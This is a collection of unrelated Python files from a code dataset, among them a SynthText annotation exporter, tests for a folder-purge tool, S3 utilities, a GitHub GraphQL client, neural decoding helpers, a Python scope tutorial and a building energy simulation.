i.e. a batch of size 16 of 8 second of audio at 44.1kHz.
We use the same number of zero crossing as `resampy` for this benchmark.
The small delta is probably
due to the different window function used.
On CPU we have:
{run_bench('resample')}
On GPU we have:
{run_bench('resample', device='cuda')}
### FFTConv1d
We compare to `pytorch.nn.functional.conv1d`, on a input of size [32, 32, 10240],
for a convolution with 32 input channels, 64 output channels and various kernel sizes.
On CPU we have:
{run_bench('fftconv')}
On GPU we have:
{run_bench('fftconv', device='cuda')}
### LowPassFilter
We do not compare to anything, but measure the attenuation in dB of a pure tone
at `0.9 * cutoff`, at the `cutoff`, and at `1.1 * cutoff`.
Note that our implementation automatically choses to use FFTConv1d or not when appropriate.
On CPU we have:
{run_bench('lowpass')}
On GPU we have:
{run_bench('lowpass', device='cuda')}
"""
print(template)
if __name__ == "__main__":
main()
| StarcoderdataPython |
71437 | <gh_stars>0
# Author: <NAME>
# Date: 2015
"""
Visualize the generated localization synthetic
data stored in h5 data-bases
"""
from __future__ import division
import io
import os
import os.path as osp
import numpy as np
import matplotlib.pyplot as plt
import h5py
from common import *
import string
import random
from PIL import Image
OUT_FOLD = 'output'
anno_fold = 'annotations'
img_fold = 'images'
def id_generator(size=8, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def save_textbb(fid, out_fold ,text_im, charBB_list, wordBB, txt, alpha=1.0):
"""
text_im : image containing text
charBB_list : list of 2x4xn_i bounding-box matrices
wordBB : 2x4xm matrix of word coordinates
"""
image = Image.fromarray(np.uint8(text_im))
sfp = os.path.join(OUT_FOLD, img_fold)
image.save(os.path.join(sfp, fid+'.jpg'))
H,W = text_im.shape[:2]
txt_out = []
for t in txt:
txt_out += t.decode('utf-8').split()
dimset = []
# plot the word-BB:
for i in range(wordBB.shape[-1]):
bb = wordBB[:,:,i]
bb = np.c_[bb,bb[:,0]]
# visualize the indiv vertices:
xyset = []
for j in range(4):
xyset.append(int(bb[0,j]))
xyset.append(int(bb[1,j]))
dimset.append(xyset)
fp = os.path.join(OUT_FOLD, anno_fold)
afp = os.path.join(fp, fid + '.txt')
with open(afp, 'w') as f:
assert len(txt_out) == len(dimset)
for i in range(len(txt_out)):
str_out = ','.join(str(x) for x in dimset[i])
str_out += ',' + txt_out[i]
f.write('{}\n'.format(str_out))
def main(db_fname, OUT_FOLD):
db = h5py.File(db_fname, 'r')
dsets = sorted(db['data'].keys())
print("total number of images : ", colorize(Color.RED, len(dsets), highlight=True))
for k in dsets:
rgb = db['data'][k][...]
charBB = db['data'][k].attrs['charBB']
wordBB = db['data'][k].attrs['wordBB']
txt = db['data'][k].attrs['txt']
fid = id_generator()
save_textbb(fid, OUT_FOLD, rgb, [charBB], wordBB, txt)
print("image name : ", colorize(Color.RED, k, bold=True))
print(" ** no. of chars : ", colorize(Color.YELLOW, charBB.shape[-1]))
print(" ** no. of words : ", colorize(Color.YELLOW, wordBB.shape[-1]))
print(" ** text : ", colorize(Color.GREEN, txt))
db.close()
if __name__=='__main__':
if not os.path.exists(OUT_FOLD):
os.makedirs(OUT_FOLD)
if not os.path.exists(os.path.join(OUT_FOLD, anno_fold)):
os.makedirs(os.path.join(OUT_FOLD, anno_fold))
os.makedirs(os.path.join(OUT_FOLD, img_fold))
main('results/SynthText.h5', OUT_FOLD)
| StarcoderdataPython |
1657579 |
import datetime
import logging
import mock
import os
import shutil
import socket
import tempfile
import unittest
from lib.purge_remote_folder import PurgeRemoteFolders
class TestPurgeRemoteFolders(unittest.TestCase):
@staticmethod
def _to_unix_timestamp(date_obj):
return (date_obj - datetime.date(1970, 1, 1)).total_seconds()
def setUp(self):
self.age_in_days = 30
self.dryrun = True
self.directory = tempfile.mkdtemp()
self.files = [
os.path.basename(tempfile.mkstemp(prefix=name, dir=self.directory)[1]) for name in [
"too_old", "too_new", "KEEP_"]]
for tfile in self.files:
atime = self._to_unix_timestamp(datetime.date.today())
mtime = atime if tfile.startswith("too_new") else \
self._to_unix_timestamp(datetime.date.today() - datetime.timedelta(days=(self.age_in_days + 1)))
os.utime(os.path.join(self.directory, tfile), (atime, mtime))
self.execution_id = "this-is-an-execution-id"
self.action = self.get_instance(
os.path.basename(self.directory), self.age_in_days, self.dryrun, self.execution_id)
self.action.archive_base_dir = self.directory
def get_instance(self, *args):
inst = PurgeRemoteFolders(*args)
inst.log = mock.MagicMock(spec=logging.Logger)
return inst
def tearDown(self):
shutil.rmtree(self.directory, ignore_errors=True)
def test_sanitize_path(self):
root_dir = os.path.join("/path", "to", "root")
abs_path = os.path.join("/this", "is", "an", "absolute", "path")
escape_path = os.path.join("..", "some", "other", "dir")
upward_path = os.path.join("this", "..", "path", "..", "has", "..", "upward", "..", "references", "..")
good_path = os.path.join("and", "subdirectory")
self.assertRaisesRegexp(ValueError, "absolute path which", self.action.sanitize_path, abs_path, root_dir)
self.assertRaisesRegexp(ValueError, "path outside of", self.action.sanitize_path, escape_path, root_dir)
self.assertEqual(root_dir, self.action.sanitize_path(upward_path, root_dir))
self.assertEqual(os.path.join(root_dir, good_path), self.action.sanitize_path(good_path, root_dir))
# create symlinks that may escape from directory
abs_symlink = "abs_symlink"
escape_symlink = "escape_symlink"
good_symlink = "good_symlink"
os.symlink(abs_path, os.path.join(self.directory, abs_symlink))
os.symlink(escape_path, os.path.join(self.directory, escape_symlink))
os.symlink(os.path.join(self.directory, good_path), os.path.join(self.directory, good_symlink))
self.assertRaisesRegexp(
ValueError, "path outside of", self.action.sanitize_path, abs_symlink, self.directory)
self.assertRaisesRegexp(
ValueError, "path outside of", self.action.sanitize_path, escape_symlink, self.directory)
self.assertEqual(
os.path.join(self.directory, good_path), self.action.sanitize_path(good_symlink, self.directory))
def test_get_files_and_folders(self):
expected_files_and_folders = filter(
lambda p: os.path.basename(p).startswith("too_old"),
self.files)
observed_files_and_folders = self.action.get_files_and_folders()
self.assertListEqual(expected_files_and_folders, observed_files_and_folders)
def test_purge_files_and_folders(self):
self.action.purge_files_and_folders(self.files)
self.assertTrue(all(map(lambda p: os.path.exists(os.path.join(self.directory, p)), self.files)))
self.action.dryrun = False
self.action.purge_files_and_folders(self.files)
self.assertFalse(any(map(lambda p: os.path.exists(os.path.join(self.directory, p)), self.files)))
self.action.purge_files_and_folders([""])
self.assertFalse(os.path.exists(self.directory))
def test_run(self):
directory_pattern = os.path.join("path", "to", "archive")
expected_directory = os.path.join("/data", socket.gethostname(), directory_pattern)
expected_output = filter(lambda p: p.startswith("too_old"), self.files)
self.action = self.get_instance(directory_pattern, self.age_in_days, self.dryrun, self.execution_id)
self.assertEqual(expected_directory, self.action.archive_base_dir)
with mock.patch.object(
self.action, 'get_files_and_folders') as get_files_and_folders, mock.patch.object(
self.action, 'purge_files_and_folders') as purge_files_and_folders:
get_files_and_folders.return_value = expected_output
observed_output = self.action.purge()
self.assertListEqual(expected_output, observed_output)
get_files_and_folders.assert_called_once_with()
purge_files_and_folders.assert_called_once_with(expected_output)
# also, ensure that exceptions are handled properly
purge_files_and_folders.side_effect = IOError("key error raised by mock")
self.assertRaises(IOError, self.action.purge)
get_files_and_folders.side_effect = ValueError("value error raised by mock")
self.assertRaises(ValueError, self.action.purge)
| StarcoderdataPython |
3243559 | <gh_stars>0
import argparse
import os, sys
import json
from shutil import copyfile
this_file_path = os.path.dirname(os.path.realpath(__file__))
sys.path.append(this_file_path.split('generators')[0])
from helper_functions import get_Manchester_Syntax
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--example_config", type=str, default=this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ntn.xml", \
help="Path to an example configuration file")
args = parser.parse_args()
kbs = ["carcinogenesis", "mutagenesis", "family-benchmark", "semantic_bible", "vicodi"]
for kb in kbs:
path = this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ontos/"+kb+".owl"
if kb == "family-benchmark":
path = this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ontos/"+kb+"_rich_background.owl"
if not os.path.isfile(path):
if kb != "family-benchmark":
copyfile(this_file_path.split('generators')[0]+"Datasets/"+kb+"/"+kb+".owl", this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ontos/"+kb+".owl")
else:
copyfile(this_file_path.split('generators')[0]+"Datasets/"+kb+"/"+kb+"_rich_background.owl", this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ontos/"+kb+"_rich_background.owl")
for kb in kbs:
with open(this_file_path.split('generators')[0]+"dl-foil/DLFoil2/"+kb+"_config.xml", "w") as file_config:
with open(this_file_path.split('generators')[0]+"Datasets/"+kb+"/Results/concept_learning_results_celoe_clp.json") as file_lp:
lps = json.load(file_lp)["Learned Concept"]
with open(args.example_config) as file_example:
example_lines = file_example.readlines()
i = 0
for line in example_lines:
if "<kb>file" in line:
file_name = kb+".owl" if kb != "family-benchmark" else "family-benchmark_rich_background.owl"
file_config.write("<kb>file:./ontos/"+file_name+"</kb>")
i += 1
continue
file_config.write(line)
i += 1
if "\t<targets>" in line:
break
file_config.write("\n")
for lp in lps:
file_config.write("\t\t<target>\n")
file_config.write("\t\t"+get_Manchester_Syntax(lp)+"\n")
file_config.write("\t\t</target>\n")
file_config.write("\n")
write = False
while i < len(example_lines):
if "</targets>" in example_lines[i]:
write = True
if write:
file_config.write(example_lines[i])
i += 1
| StarcoderdataPython |
1656669 | """
Find the largest 0 to 9 pandigital
that can be formed by concatenating products
""" | StarcoderdataPython |
58027 | <reponame>husqvarnagroup/GETL
"""
The Utils module containing utility functions for lift jobs.
Utilities supported:
1. json_to_spark_schema: Converts a json schema to spark schema.
2. delete_files: Deletes a list of s3 files provided.
3. copy_keys: Copies files between S3 buckets.
4. copy_and_cleanup: Copies files between S3 and removes them from source.
"""
from typing import Dict, List, Tuple, TypeVar
from pyspark.sql.types import StructType
from getl.logging import get_logger
from .s3path import S3Path
LOGGER = get_logger(__name__)
JsonSchemaType = TypeVar("T", int, float, str)
def json_to_spark_schema(json_schema: Dict[str, JsonSchemaType]) -> StructType:
"""
Return Spark Schema for a JSON schema.
Args:
json_schema (Dict[str, JSON_SCHEMA_TYPE]): schema in json format.
Returns:
StructType: Spark Schema for the corresponding JSON schema.
Raises:
KeyError: Missing Schema key fields Name/Field/Nullable
TypeError: Invalid json was provided
"""
try:
return StructType.fromJson(json_schema)
except KeyError as key_error:
LOGGER.error(str(key_error))
raise KeyError(
"Missing key: {0}. Valid format: {1}".format(
str(key_error),
"All schema columns must have a name, type and nullable key",
)
)
except TypeError as key_error:
LOGGER.error(str(key_error))
raise TypeError("Invalid json was provided")
def delete_files(paths: List[str]) -> None:
"""Delete list of files from S3 bucket.
Args:
paths (List[str]): A list of paths pointing out to a key
Returns:
None
Raises:
PermissionError: When requested to deleted files from raw layer
Sample Use:
delete_files(['s3://landingzone/amc-connect/file.txt', 's3://datalake/amc/raw/file.txt'])
"""
# TODO: remove me
if any("husqvarna-datalake/raw/" in path for path in paths):
raise PermissionError(
"Access Denied: Not possible to remove files from raw layer"
)
for path in paths:
s3path = S3Path(path)
s3path.delete()
def copy_and_cleanup(paths: List[Tuple[str]]) -> None:
"""Move files from source S3 bucket to the destination bucket.
Args:
paths (List[Tuple[str]]): a list that represents [('source', 'target')...]
Returns:
None
Calls:
copy_keys to copy files between buckets
delete_files for source cleanup
Sample Use:
copy_keys([('landingzone/amc-connect/file.txt', 'datalake/amc/raw/file.txt')])
"""
copy_keys(paths)
delete_files([t[0] for t in paths])
def copy_keys(paths: List[Tuple[str]]) -> None:
"""Copy files from source S3 bucket to the destination bucket.
Args:
paths (List[Tuple[str]]): a list that represents [('source', 'target')...]
Returns:
None
Raises:
FileNotFoundError: When any of requested files are not found in S3
Sample Use:
copy_keys([('landingzone/amc-connect/file.txt', 'datalake/amc/raw/file.txt')])
"""
# TODO: Remove me
for path in paths:
source = S3Path(path[0])
target = S3Path(path[1])
source.copy(target)
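# Minimal usage sketch (not part of the original module): json_to_spark_schema only needs a
# schema dict in Spark's JSON format, so it can be exercised without any S3 access.
if __name__ == "__main__":
    example_schema = {
        "type": "struct",
        "fields": [
            {"name": "id", "type": "integer", "nullable": False, "metadata": {}},
            {"name": "name", "type": "string", "nullable": True, "metadata": {}},
        ],
    }
    print(json_to_spark_schema(example_schema))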
| StarcoderdataPython |
1678039 | import sqlite3
from sqlbuilder.smartsql import Q, T, Result
from sqlbuilder.smartsql.dialects.sqlite import compile
from .Users import Users
class DbUsers(Users):
def __init__(self, db_name: str) -> None:
self.db_name = db_name
def add(self, email):
# type: (str) -> None
with sqlite3.connect(self.db_name) as connection:
connection.execute(
*Q(
T.user, result=Result(compile=compile)
).insert(
{
T.user.email: email
}
)
)
def contains(self, email):
# type: (str) -> bool
contains = False
with sqlite3.connect(self.db_name) as connection:
info = connection.execute(
*compile(Q(T.user).fields('*').where(T.user.email == email))
).fetchone()
if info:
contains = True
return contains
| StarcoderdataPython |
10036 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from appconf import AppConf
from django.conf import settings # noqa
class LabjsConf(AppConf):
ENABLED = not settings.DEBUG
DEBUG_TOGGLE = 'labjs'
| StarcoderdataPython |
171610 | from django.test import TestCase
from devnotes.models import Devnote
class DevnoteTestCases(TestCase):
def setUp(self):
Devnote.objects.create(name='testnote',
description='testnote description')
def test_retrieve_note(self):
"""retrieve the testnote"""
testnote=Devnote.objects.all()[0]
self.assertEqual(testnote.name, 'testnote')
def test_create_new_entry(self):
"""create new note"""
new_note = Devnote.objects.create(name='newnote',
description='newnote description')
db_entry= Devnote.objects.order_by('-created_at')[0]
self.assertEqual(new_note.name,db_entry.name)
| StarcoderdataPython |
88417 | <gh_stars>0
import json
import requests
from requests.models import Response
from src.models.GithubException import GithubException
class Graphql:
url: str
items_per_request: int
cursor = None
def __init__(self, url: str, items_per_request: int) -> None:
self.url = url
self.items_per_request = items_per_request
def get_disk_usage_query(self, owner: str, name: str):
return """
query {
repository(owner: "%(owner)s", name: "%(name)s") {
diskUsage
}
}
""" % {
'owner': owner,
'name': name,
}
def get_labels_query(self, owner: str, name: str):
return """
query {
repository(owner: "%(owner)s", name: "%(name)s") {
labels(first: 10, query: "bug error fix") {
nodes {
... on Label {
name
}
}
}
}
}
""" % {
'owner': owner,
'name': name,
'after': ('"{}"'.format(self.cursor) if self.cursor else 'null')
}
def get_issues_query(self, owner: str, name: str, labels: list[str]):
return """
query {
repository(owner: "%(owner)s", name: "%(name)s") {
issues(first: %(issues)i, labels: [%(labels)s],after: %(after)s) {
pageInfo {
hasNextPage
}
edges {
cursor
node {
... on Issue {
id
state
}
}
}
}
}
}
""" % {
'owner': owner,
'name': name,
'issues': self.items_per_request,
'labels': ','.join('"{}"'.format(item) for item in labels),
'after': ('"{}"'.format(self.cursor) if self.cursor else 'null')
}
def get_prs_query(self, owner: str, name: str, labels: list[str]):
return """
query {
repository(owner: "%(owner)s", name: "%(name)s") {
pullRequests(first: %(issues)i, after: %(after)s) {
pageInfo {
hasNextPage
}
edges {
cursor
node {
... on PullRequest {
id
state
body
labels(first: 10) {
nodes {
name
}
}
}
}
}
}
}
}
""" % {
'owner': owner,
'name': name,
'issues': self.items_per_request,
'after': ('"{}"'.format(self.cursor) if self.cursor else 'null')
}
def _fetch_data(self, query: str, token: str) -> dict:
response: Response = requests.post(self.url, json={'query': query}, headers={
'Authorization': token
})
if response.status_code != 200:
raise GithubException(
'There was an error while trying to make the request'
)
return json.loads(response.text)
def get_labels_data(self, query: str, token: str):
json_data = self._fetch_data(query, token)
labels_nodes = json_data['data']['repository']['labels']['nodes']
return [item['name'] for item in labels_nodes]
def get_disk_usage_data(self, query: str, token: str):
json_data = self._fetch_data(query, token)
disk_usage = json_data['data']['repository']['diskUsage']
return disk_usage
def get_issues_data(self, query: str, token: str):
json_data = self._fetch_data(query, token)
issues = json_data['data']['repository']['issues']
has_next_page = issues['pageInfo']['hasNextPage']
edges: list = issues['edges']
if not has_next_page:
self.cursor = None
else:
self.cursor = edges[-1]['cursor']
return edges, has_next_page
def get_prs_data(self, query: str, token: str):
json_data = self._fetch_data(query, token)
prs = json_data['data']['repository']['pullRequests']
has_next_page = prs['pageInfo']['hasNextPage']
edges: list = prs['edges']
if not has_next_page:
self.cursor = None
else:
self.cursor = edges[-1]['cursor']
return edges, has_next_page
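# Minimal usage sketch (not part of the original module; the endpoint, owner/repo names and
# label list are placeholders). Only the query string is built here, no request is sent.
if __name__ == "__main__":
    gql = Graphql("https://api.github.com/graphql", items_per_request=50)
    print(gql.get_issues_query("octocat", "hello-world", ["bug", "error", "fix"]))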
| StarcoderdataPython |
157617 | """Part of the flag-loader project.
Copyright: (C) 2014 <NAME>
License: MIT License (see LICENSE.txt)
Exported classes: BaseResolver
"""
from abc import ABCMeta, abstractmethod
class BaseResolver(object, metaclass=ABCMeta):
"""Abstract base class for all resolvers."""
@abstractmethod
def get_flag(self, data):
pass
@abstractmethod
def normalize(self, data):
pass
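# Minimal sketch of a concrete resolver (not part of the original module), showing how the two
# abstract methods are meant to be overridden by subclasses.
class EchoResolver(BaseResolver):
    def get_flag(self, data):
        # A real resolver would map the normalized data to a flag here.
        return data

    def normalize(self, data):
        return str(data).strip().lower()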
| StarcoderdataPython |
127362 | <reponame>AlbertSuarez/casescan
from src.engine.initializator import cases_db
from src.helper import response_builder
def get(case_id=None):
if case_id:
if case_id in cases_db:
return response_builder.make(
False, response=dict(results=[dict(case_id=case_id, sections=cases_db.get(case_id))])
)
else:
return response_builder.make(True, message=f'Clinical case with id [{case_id}] could not be found.')
else:
return response_builder.make(
False, response=dict(results=[dict(case_id=k, sections=v) for k, v in cases_db.items()])
)
| StarcoderdataPython |
3262464 | import warnings
# Version
__version__ = '0.2.0'
# Check for dependencies
hard_dependencies = ['numpy','pandas','seaborn','scipy','matplotlib','sklearn']
missing_dependencies = []
for dependency in hard_dependencies:
try:
__import__(dependency)
except ImportError as e:
missing_dependencies.append(dependency)
if missing_dependencies:
warnings.warn("Missing required dependencies {0}".format(missing_dependencies), ImportWarning)
del hard_dependencies, dependency, missing_dependencies
| StarcoderdataPython |
11818 | <filename>algorithms/python/118.py
class Solution:
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
if numRows == 0: return []
rls = [[1]]
for i in range(2, numRows+1):
row = [1] * i
for j in range(1, i-1):
row[j] = rls[-1][j-1] + rls[-1][j]
rls.append(row)
return rls
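# Minimal usage sketch (not part of the original solution file).
if __name__ == "__main__":
    print(Solution().generate(5))  # [[1], [1, 1], [1, 2, 1], [1, 3, 3, 1], [1, 4, 6, 4, 1]]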
| StarcoderdataPython |
1617739 | <reponame>IvanGavrilin/pyview
# The MIT License (MIT)
#
# Copyright (c) 2016 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# marker: see MPL doc
_SUPPORTED_ARGS = dict(size=1, color=1, alpha=1, zorder=1)
_FLOAT_ARGS = dict(alpha=1, size=1)
class Channel:
def __init__(self, stream, ax, **kw):
self.stream = stream
self.dirty = True
self.datatm = []
self.data = []
self.axes = ax
args = {}
for k, v in kw.items():
if not k in _SUPPORTED_ARGS:
#raise Exception("Line: unknown arg '{}'".format(k))
continue
if k in _FLOAT_ARGS:
args[k] = float(v)
else:
args[k] = str(v)
self.props = args
def prepare_artists(self):
if not self.dirty:
return False
if self.data:
self.axes.set_title(self.data[-1], **self.props)
self.dirty = False
return True
def destroy(self):
self.axes.set_title('')
self.stream = None
def update_from_str(self, tm, line):
self.dirty = True
self.datatm.append(tm)
self.data.append(line)
self.stream.invalidate()
def _update_text(self, text, text_tm):
old_title = self.axes.get_title()
if old_title != text:
self.axes.set_title(text, **self.props)
return (True, text_tm)
return (False, )
def mouse_move(self, event):
for i in range(len(self.datatm)-1, -1, -1):
if event.xdata >= self.datatm[i]:
return self._update_text(self.data[i], self.datatm[i])
return self._update_text('', None)
def mouse_leave(self, event):
return self._update_text(self.data[-1], None)
| StarcoderdataPython |
3327281 | import numpy as np
from sklearn.decomposition import PCA
from sklearn.linear_model import LogisticRegression
from data_utils import *
def predict_all(model, all_data):
"""
Predict odor probabilities for all trials.
:param model: (keras) decoding model
:param all_data: (4d numpy array) data of format [trial, window, neuron, time]
:return: (3d numpy array) prediction of format [trial, time, odor]
"""
test = stack_data(all_data, 25, 10)
n_trial, n_window = test.shape[0:2]
all_pred = np.zeros((n_trial, n_window, 5))
for i in range(n_trial):
all_pred[i, :, :] = model.predict(test[i, :, :, :])
return all_pred
def extract_latent(intermediate_layer, spike_data, lfp_data, tetrode_ids, tetrode_units, window, stride):
"""
Extract latent representation of decoding model.
:param intermediate_layer: (keras) function that outputs last hidden layer
:param spike_data: (3d numpy array) spike train data of format [trial, neuron, time]
:param lfp_data: (3d numpy array ) LFP data of format [trial, tetrode, time]
:param tetrode_ids: (list) of tetrode ids in the order of LFP data
:param tetrode_units: (dict) number of neuron units on each tetrode
:param window: (int) time window size must be the same for training the model
:param stride: (int) moving window stride
:return: (3d numpy array) latent space of format [trial, window, dim]
"""
spike_stack = stack_data(spike_data, window, stride)
lfp_stack = stack_data(lfp_data, window, stride)
n_trial, n_window = spike_stack.shape[:2]
all_latent = np.zeros((n_trial, n_window, 10))
for i in range(n_window):
test_data = organize_tetrode(spike_stack[:, i, :, :], lfp_stack[:, i, :, :],
tetrode_ids, tetrode_units, verbose=False)
latent = intermediate_layer.predict(test_data)
all_latent[:, i, :] = latent
return all_latent
def latent_models(latent_data, latent_target, decoding_index):
"""
Create models in latent space: PCA model to reduce dimensionality and logistic regression model for decoding.
:param latent_data: (3d numpy array) latent space of format [trial, window, dim]
:param latent_target: (1d numpy array) odor target
:param decoding_index: (int) which time window to use
:return: (sklearn) PCA and LR models
"""
temp = np.split(latent_data, latent_data.shape[1], axis=1)
latent_stack = np.vstack([x[:, 0, :] for x in temp])
pca = PCA(n_components=2)
pca = pca.fit(latent_stack)
latent_decoding = pca.transform(latent_data[:, decoding_index, :])
clf = LogisticRegression(multi_class='multinomial', solver='lbfgs')
clf = clf.fit(latent_decoding, latent_target)
return pca, clf
def latent_grid(latent_data, pca, clf, h=0.01):
"""
Create grid in latent for visualization.
"""
temp = np.split(latent_data, latent_data.shape[1], axis=1)
latent_stack = np.vstack([x[:, 0, :] for x in temp])
principal = pca.transform(latent_stack)
x_max, y_max = np.max(principal, axis=0) + 0.1
x_min, y_min = np.min(principal, axis=0) - 0.1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
return xx, yy, Z
def align_rolling(trial_idx, time_idx, data_spike, scaler, decoder):
"""
Predict with a rolling window around SWR events.
"""
rolling_hat = np.zeros((20, 4))
for i in range(20):
current_start = time_idx - 20 + i * 2
current_end = current_start + 25
current_window = np.expand_dims(data_spike[trial_idx, :, current_start:current_end], axis=0)
current_data = scaler.transform(np.mean(current_window, axis=2))
current_hat = decoder.predict_proba(current_data)
rolling_hat[i, :] = current_hat
return rolling_hat
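# Minimal usage sketch (not part of the original module): random numbers stand in for real
# latent activations and odor labels, just to exercise latent_models and latent_grid end to end.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    fake_latent = rng.normal(size=(40, 6, 10))   # [trial, window, dim]
    fake_target = rng.randint(0, 5, size=40)     # odor labels 0..4
    pca, clf = latent_models(fake_latent, fake_target, decoding_index=3)
    xx, yy, Z = latent_grid(fake_latent, pca, clf, h=0.5)
    print(Z.shape)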
| StarcoderdataPython |
1669854 | <reponame>bcpki/bitcoin
#!/usr/bin/env python
#
# BCPKI - BlockchainPKI
# Copyright (C) 2013 <EMAIL>, <EMAIL>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, getopt, os
from bcert import *
# default
ascii = data = binhex = store = filename = False
pretty = True
optlist,args = getopt.getopt(sys.argv[1:],'adxsf')
for (k,v) in optlist:
if k in ["-a","-d","-x","-f"]:
pretty = False
if k == "-a": ascii = True
elif k == "-d": data = True
elif k == "-x": binhex = True
elif k == "-s": store = True
elif k == "-f": filename = True
if store:
idx = alias2idx(args[0])
fname = os.path.expanduser('~/.bitcoin/testnet3/bcerts/'+idx+'.bcrt')
if filename: print idx
else:
fname = args[0]
bcrt = open(fname).read()
if pretty: print bcrt2cert(bcrt)
if ascii: print bcrt2asciiarmored(bcrt)
if data: print bcrt2hashx(bcrt)
if binhex: print bcrt.encode('hex')
| StarcoderdataPython |
4802130 | <filename>00Python/day07/basic02.py<gh_stars>100-1000
"""
A local variable in a function is released as soon as the function finishes executing.
A global variable is destroyed only when the whole program finishes; its scope spans the whole program.
1- If a local variable has the same name as a global one, the nearest (local) binding wins during execution.
2- If a name cannot be found inside the function, the global variable is looked up instead.
3- If the function wants to modify the outer global variable, use the global keyword.
"""
num = 10
def my_func01():
    # num = 20  # this would create a new local variable instead
    global num
    num = 20  # use the existing global variable rather than creating a new local one
    print("inner num = %s" % num)
my_func01()
print("outer num = %s" % num)
"""
A function's built-in documentation string can be shown with help(len).
If a function defines no docstring of its own, help() has no description of it to show.
"""
help(len)
# a plain comment like this one is not a docstring, so help() will not return it
def my_func02(num01, num02):
"""
    Return the sum of the two parameters.
    :param num01: first number
    :param num02: second number
    :return: the sum of the two numbers
"""
return num01 + num02
help(my_func02)
"""
id(obj) returns the identity of obj, i.e. the "house number" of the object it references in memory.
Analogy: a room is booked but nobody has moved in yet; it is only occupied when the value is actually used.
a and b point to the same room, which saves memory.
"""
a = 1000
b = 1000
c = "abc" # strings, tuples (), etc. are immutable; "modifying" them copies the value into a new room
d = "abc" # lists [] and dicts are mutable; modifications happen inside the same room
c = "abcd"
print(id(a))
print(id(b))
print(id(c))
print(id(d))
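# Extra illustration (not part of the original lesson): mutating a list keeps the same id,
# while "changing" a string rebinds the name to a brand-new object.
lst = [1, 2, 3]
print(id(lst))
lst.append(4)   # in-place change: same room, same id
print(id(lst))
s = "abc"
print(id(s))
s = s + "d"     # builds a new string object: a different room, a different id
print(id(s))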
| StarcoderdataPython |
4819287 | <filename>backend/simulation/demandside/building.py
from simulation.demandside.component import ComponentSim
from simulation.location_entity import LocationEntity
from database.models import Building
class BuildingSim(LocationEntity):
def __init__(self, name, lat, long, listOfComponents, historicalData, hour = 0):
LocationEntity.__init__(self, name, lat, long)
self.listOfComponets = listOfComponents
self.historicalData = historicalData
self.hour = hour
@classmethod
def createFromModel(cls, building):
listOfComponets = []
for comp in building.components:
listOfComponets.append(ComponentSim(comp.name, comp.est, comp.let, comp.e, comp.lot))
return cls(building.name, building.lat, building.long, listOfComponets, building.historicalData)
@classmethod
def household(cls, name, lat, long):
washing_machine = ComponentSim("washing_machine", 9, 17, 2, 2)
dish_washer = ComponentSim("dish_washer", 9, 12, 1.8, 2)
spin_dryer = ComponentSim("spin_dryer", 13, 18, 2.5, 1)
electrical_vehicle = ComponentSim("electrical_vehicle", 18, 24, 3.5, 3)
vacuum_cleaner = ComponentSim("vacuum_cleaner", 9, 17, 1.2, 1)
listOfComponets = [washing_machine, dish_washer, spin_dryer, electrical_vehicle, vacuum_cleaner]
historicalData = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
return cls(name, lat, long, listOfComponets, historicalData)
@classmethod
def office(cls, name, lat, long):
dish_washer1 = ComponentSim("dish_washer1", 9, 12, 1.8, 2)
dish_washer2 = ComponentSim("dish_washer2", 9, 12, 1.8, 2)
dish_washer3 = ComponentSim("dish_washer3",9, 12, 1.8, 2)
dish_washer4 = ComponentSim("dish_washer4",9, 12, 1.8, 2)
vacuum_cleaner1 = ComponentSim("vacuum_cleaner1", 7, 10, 1.2, 1)
vacuum_cleaner2 = ComponentSim("vacuum_cleaner2", 7, 9, 1.2, 1)
vacuum_cleaner3 = ComponentSim("vacuum_cleaner3", 19, 21, 1.2, 1)
vacuum_cleaner4 = ComponentSim("vacuum_cleaner4", 19, 23, 1.2, 1)
electrical_vehicle1 = ComponentSim("electrical_vehicle1", 8, 18, 3.5, 3)
electrical_vehicle2 = ComponentSim("electrical_vehicle2",18, 24, 3.5, 3)
listOfComponets = [dish_washer1, dish_washer2, dish_washer3, dish_washer4, vacuum_cleaner1, vacuum_cleaner2, vacuum_cleaner3, vacuum_cleaner4, electrical_vehicle1, electrical_vehicle2]
historicalData = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
